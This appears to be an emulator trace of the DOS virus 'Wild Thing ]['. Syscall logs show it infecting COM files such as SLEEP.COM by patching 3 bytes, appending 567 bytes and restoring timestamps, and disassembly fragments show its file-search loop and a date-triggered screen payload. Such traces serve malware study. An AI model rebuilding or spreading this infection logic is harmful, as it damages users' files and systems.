2018-12-25T12:42:07.377852222Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.386436799Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.396402672Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.39916763Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.405551016Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.415260285Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.426965818Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.429201988Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.435717052Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.437382263Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.44531993Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.455408338Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.457955175Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:07.462954575Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:07.465216294Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:07.466523164Z 9 PC: 12b6a | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:42:09.676538315Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:42:09.67892868Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:42:09.681394178Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:42:09.685276963Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:42:09.696583864Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:42:09.698061632Z 62 PC: 91fc1 | Close file
2018-12-25T12:42:09.700315139Z 75 PC: 91fe0 | Execute program
2018-12-25T12:42:09.716489141Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:42:09.718082592Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:42:09.722560657Z 48 PC: c609 | Get DOS version
2018-12-25T12:42:09.726555621Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:42:09.728911115Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:42:09.731084779Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:42:09.734953086Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:09.739818408Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:09.744939003Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:42:09.755924177Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:42:09.757631589Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:42:09.759937382Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:42:09.780330611Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:42:09.784305463Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:42:09.785884277Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:09.787782759Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:09.789179307Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:09.790593319Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:09.792197944Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:42:09.800414656Z 62 PC: 8f8eb | Close file
2018-12-25T12:42:09.802435239Z 62 PC: 8f8f2 | Close file
2018-12-25T12:42:09.80598733Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.807695338Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.809530957Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.8116674Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.813170771Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.814728341Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.816380584Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.818016435Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.819669321Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.822168974Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.823762571Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.825082813Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.828553345Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.830080189Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.831746314Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.833798118Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.835216517Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.836519489Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.838609846Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.839915976Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.841214474Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.843200885Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.844672474Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.846137092Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.848514168Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.85000087Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.851378548Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.853735021Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.855063557Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.856378118Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:42:09.861585142Z 62 PC: 8f90e | Close file
2018-12-25T12:42:09.863323755Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:42:09.864778205Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:42:09.867179595Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:42:09.874942919Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:42:09.876206284Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:42:09.890269976Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:42:09.891704004Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:42:09.892881653Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:42:09.895123313Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:42:09.896422989Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:42:09.897551683Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:42:09.899479246Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:42:09.90084123Z 73 PC: 8fa11 | Release memory
2018-12-25T12:42:09.902099383Z 73 PC: 8efea | Release memory
2018-12-25T12:42:09.903750526Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:42:09.90541269Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:42:09.907076464Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:42:09.908842221Z 73 PC: 8f060 | Release memory
2018-12-25T12:42:09.909940967Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:42:09.918502475Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:42:09.924149728Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:42:09.925400706Z 62 PC: 8f0d1 | Close file
2018-12-25T12:42:09.926871801Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:42:09.948543873Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:42:09.949514201Z 48 PC: 12bee | Get DOS version
2018-12-25T12:42:09.951312801Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:42:09.956015795Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:42:09.957810468Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:42:09.959205298Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:42:09.961882013Z 72 PC: 1355d | Allocate memory
2018-12-25T12:42:09.963782047Z 25 PC: 13596 | Get default drive
2018-12-25T12:42:09.965225918Z 71 PC: 135ad | Get current directory
2018-12-25T12:42:09.968726113Z 59 PC: 135ba | Change current directory
2018-12-25T12:42:09.973927625Z 59 PC: 135c8 | Change current directory
2018-12-25T12:42:09.979564263Z 59 PC: 135d3 | Change current directory
2018-12-25T12:42:09.984331947Z 25 PC: 12d13 | Get default drive
2018-12-25T12:42:09.985760801Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:42:09.987151565Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:42:09.989732116Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:09.992103375Z 80 PC: 1301d | Set current PSP
2018-12-25T12:42:09.993351377Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:42:09.995489623Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:09.99677517Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:09.999833881Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:42:10.002537131Z 72 PC: 130ec | Allocate memory
2018-12-25T12:42:10.004550766Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:42:10.01174255Z 62 PC: 131ba | Close file
2018-12-25T12:42:10.014108535Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:42:10.016209884Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:42:10.018559406Z 72 PC: 11991 | Allocate memory
2018-12-25T12:42:10.021003563Z 73 PC: 119b2 | Release memory
2018-12-25T12:42:10.022567345Z 72 PC: 119bd | Allocate memory
2018-12-25T12:42:10.025533086Z 73 PC: 119df | Release memory
2018-12-25T12:42:10.02705237Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:42:10.029102635Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:07.179696199Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:07.181341405Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:07.183620592Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:07.186742466Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:07.190109289Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:07.196706102Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:07.209306074Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:07.215666262Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:07.880566477Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:07.888738844Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:07.890741104Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:07.908674631Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:07.91033109Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:07.913244829Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.915978816Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:07.958726448Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:07.960422493Z 62 PC: 12bfc | Close file
2018-12-25T12:42:08.024558365Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:08.079179906Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.081328669Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.086198744Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.130799755Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.138369001Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.140880513Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.148205243Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.149811981Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.152887847Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.155614568Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.207641768Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.211005946Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.22802579Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.239311265Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.242219573Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.249966939Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.259391524Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.2716927Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.274810508Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.283403911Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.285452099Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.289683469Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.292716574Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.302470107Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.304558202Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.314647242Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.326508603Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.33010238Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.336273142Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.345072417Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.352804102Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.355187397Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.363156507Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.365216437Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.369621295Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.372394899Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.381889898Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.384870609Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.394221782Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.406563918Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.410278814Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.418107798Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.431320425Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.435714094Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.437945836Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.442386602Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.443619461Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.446086007Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.447458306Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.452877132Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.454811774Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.463517977Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.475226233Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.479957066Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.487231026Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.498895718Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.507181254Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.510352128Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.517979133Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.51929796Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.52228255Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.523704474Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.530414987Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.533497148Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.544077338Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.555616634Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.559656753Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.566977102Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.578495819Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.588080715Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.590461113Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.598537387Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.600437824Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.604747346Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.607117779Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.616225926Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.619315925Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.628167294Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.639836887Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.644055289Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.65094895Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.66226068Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.67126636Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.673334227Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.680942855Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.683343499Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.691741721Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.704556037Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.707466595Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:08.713087236Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:08.715241614Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:08.716529256Z 9 PC: 12b6a | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:42:10.923057812Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:42:10.925874099Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:42:10.928857923Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:42:10.933391445Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:42:10.945818821Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:42:10.947544715Z 62 PC: 91fc1 | Close file
2018-12-25T12:42:10.950407792Z 75 PC: 91fe0 | Execute program
2018-12-25T12:42:10.970204649Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:42:10.971733239Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:42:10.976483141Z 48 PC: c609 | Get DOS version
2018-12-25T12:42:10.98130309Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:42:10.984753709Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:42:10.987217411Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:42:10.992333852Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:10.997122657Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:11.004170699Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:42:11.017235393Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:42:11.019659349Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:42:11.022427329Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:42:11.047026628Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:42:11.053162834Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:42:11.055062788Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:11.057090669Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:11.059707787Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:11.061421042Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:11.062905041Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:42:11.071848727Z 62 PC: 8f8eb | Close file
2018-12-25T12:42:11.075768947Z 62 PC: 8f8f2 | Close file
2018-12-25T12:42:11.078256778Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.081127616Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.082740118Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.08433589Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.086727118Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.088531942Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.09080366Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.093335368Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.095126171Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.097219087Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.09975818Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.101479628Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.103160443Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.110158446Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.111901807Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.11378568Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.116015917Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.118179252Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.120189231Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.122567379Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.124465257Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.126013788Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.128299589Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.130266556Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.133539036Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.136358082Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.14096975Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.142983971Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.145779445Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.1481084Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:42:11.153860355Z 62 PC: 8f90e | Close file
2018-12-25T12:42:11.156913269Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:42:11.159422399Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:42:11.162187664Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:42:11.169146943Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:42:11.171437917Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:42:11.17752515Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:42:11.180364444Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:42:11.182354539Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:42:11.185315315Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:42:11.187313001Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:42:11.189899036Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:42:11.192285894Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:42:11.194558941Z 73 PC: 8fa11 | Release memory
2018-12-25T12:42:11.196902811Z 73 PC: 8efea | Release memory
2018-12-25T12:42:11.198489574Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:42:11.201134461Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:42:11.20355905Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:42:11.205264026Z 73 PC: 8f060 | Release memory
2018-12-25T12:42:11.206781461Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:42:11.21913288Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:42:11.225533625Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:42:11.227081338Z 62 PC: 8f0d1 | Close file
2018-12-25T12:42:11.229313635Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:42:11.256258575Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:42:11.257306287Z 48 PC: 12bee | Get DOS version
2018-12-25T12:42:11.25976094Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:42:11.263137037Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:42:11.265230308Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:42:11.267563039Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:42:11.269580854Z 72 PC: 1355d | Allocate memory
2018-12-25T12:42:11.271690266Z 25 PC: 13596 | Get default drive
2018-12-25T12:42:11.273989695Z 71 PC: 135ad | Get current directory
2018-12-25T12:42:11.276993418Z 59 PC: 135ba | Change current directory
2018-12-25T12:42:11.284089271Z 59 PC: 135c8 | Change current directory
2018-12-25T12:42:11.293092038Z 59 PC: 135d3 | Change current directory
2018-12-25T12:42:11.29797532Z 25 PC: 12d13 | Get default drive
2018-12-25T12:42:11.299885443Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:42:11.302048313Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:42:11.303530392Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:11.306299107Z 80 PC: 1301d | Set current PSP
2018-12-25T12:42:11.308591007Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:42:11.313539604Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:11.314821714Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
